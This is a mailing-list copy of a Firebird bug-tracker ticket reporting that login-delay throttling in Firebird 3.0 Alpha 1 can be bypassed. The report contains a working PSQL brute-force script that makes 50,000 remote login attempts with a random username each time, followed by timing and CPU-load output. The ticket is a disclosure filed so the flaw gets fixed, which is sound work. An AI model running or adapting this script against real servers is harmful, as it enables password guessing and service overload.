[Firebird-devel] [FB-Tracker] Created: (CORE-4192) Remove the ability to make brute-force attack that will *not* be forced wait between it`s iterations

Sun, 25 Aug 2013 06:04:48 -0700 

Remove the ability to make brute-force attack that will *not* be forced wait 
between it`s iterations
----------------------------------------------------------------------------------------------------

                 Key: CORE-4192
                 URL: http://tracker.firebirdsql.org/browse/CORE-4192
             Project: Firebird Core
          Issue Type: Task
          Components: Security
    Affects Versions: 3.0 Alpha 1
            Reporter: Pavel Zotov


There is ability to make brute-force attack that will *not* be forced wait 
between it`s iterations.
It seems that for such attack user name on iteration N+1 always must distinct 
from all previous used user names on steps 1,2, ..., N.

DDL:
####
-- empty database, alias = 'empty30':
create sequence hackgen;
create table hacklog(
 id bigint primary key,
 dtsbeg timestamp,
 dtsend timestamp,
 delay_ms computed by (datediff( millisecond from dtsbeg to dtsend ) )
);
commit;

Script that can start brute-force attack without being forced to wait ~8 
seconds:
##########################
delete from hacklog;
commit;
alter sequence hackgen restart with 0;
commit;
set term ^;
execute block returns(id int, f01 int)
as
  declare host varchar(128) = '192.168.99.44/3330:empty30' ;
  declare stt varchar(255) = 'select id, f01 from t30 rows 3'; - no matter what 
is the table name here: we will use always wrong usr/psw
  declare usr varchar(255);
  declare psw varchar(255);
  declare v_id bigint;
  declare v_cnt int = 50000;
begin
   while(v_cnt > 0) do begin
       begin
           in autonomous transaction do
                insert into hacklog(id, dtsbeg)
                values( gen_id(hackgen,1), 'now' )
                returning id into v_id;

           usr = rpad( '', 8, uuid_to_char(gen_uuid()) );
           psw = rpad( '', 8, uuid_to_char(gen_uuid()) );
           for
               execute statement (:stt)
               on external (:host)
               as user :usr password :psw
           into
               :id, :f01
           do
               suspend;
           leave;
       when any
            do begin
               in autonomous transaction do
                   update hacklog set dtsend='now' 
                   where id=:v_id;
            end
       end
       v_cnt = v_cnt -1;
   end
end^
set term ;^
commit;

select 
   x.*
  ,datediff(second from attack_begin to attack_final) attack_seconds
from( select min(dtsbeg) attack_begin, max(dtsbeg) attack_final from hacklog) x;

set width id 6;
select cast(id as varchar(6)) id, dtsbeg, dtsend, delay_ms, count(*)over() 
total_tries 
from hacklog h 
order by delay_ms desc 
rows 5;
commit;

Result:
######
             ATTACK_BEGIN              ATTACK_FINAL        ATTACK_SECONDS
========================= ========================= =====================
2013-08-25 15:45:12.4170  2013-08-25 16:25:06.2580                   2394


ID                        DTSBEG                    DTSEND              
DELAY_MS           TOTAL_TRIES
====== ========================= ========================= 
===================== =====================
31301  2013-08-25 16:08:09.2340  2013-08-25 16:08:09.9700                    
736                 50000
44960  2013-08-25 16:20:15.5130  2013-08-25 16:20:16.1530                    
640                 50000
48901  2013-08-25 16:24:01.7380  2013-08-25 16:24:02.3500                    
612                 50000
20824  2013-08-25 15:59:33.6890  2013-08-25 15:59:34.2610                    
572                 50000
46878  2013-08-25 16:22:07.6870  2013-08-25 16:22:08.2560                    
569                 50000

So, the maximum pause values between iterations of brute attack was less than 1 
second.
It contrast with variant when user name is defined at compile time (e.g. 'U30') 
OR even if it is evaluated  in some "strange" manner like 'U' || LEFT(CAST( 30 
+ rand() AS VARCHAR(32) ), 2) etc - these will be forced to wait every 4..5 
iterations for ~8 seconds.


PS. The `firebird` process will load CPU during all the time of this attack:

Tasks: 120 total,   1 running, 119 sleeping,   0 stopped,   0 zombie
Cpu0  : 19.3%us,  3.1%sy,  0.0%ni, 62.2%id, 15.1%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu1  :  2.0%us,  0.3%sy,  0.0%ni, 97.0%id,  0.7%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 11.4%us,  1.5%sy,  0.0%ni, 77.4%id,  9.3%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu3  :  1.3%us,  0.0%sy,  0.0%ni, 96.4%id,  2.3%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu4  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu5  :  4.3%us,  0.3%sy,  0.0%ni, 94.7%id,  0.7%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu6  :  0.3%us,  0.0%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu7  :  6.0%us,  0.6%sy,  0.0%ni, 83.2%id, 10.2%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   4056652k total,   919884k used,  3136768k free,   138908k buffers
Swap: 16383996k total,        0k used, 16383996k free,   248888k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 6281 firebird  20   0 1701m 283m 8876 S 56.9  7.2  27:54.25 firebird
 6280 firebird  20   0 28184  980  644 S  0.0  0.0   0:00.00 fbguard


-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: 
http://tracker.firebirdsql.org/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

        

------------------------------------------------------------------------------
Introducing Performance Central, a new site from SourceForge and 
AppDynamics. Performance Central is your source for news, insights, 
analysis and resources for efficient Application Performance Management. 
Visit us today!
http://pubads.g.doubleclick.net/gampad/clk?id=48897511&iu=/4140/ostg.clktrk
Firebird-Devel mailing list, web interface at 
https://lists.sourceforge.net/lists/listinfo/firebird-devel

Reply via email to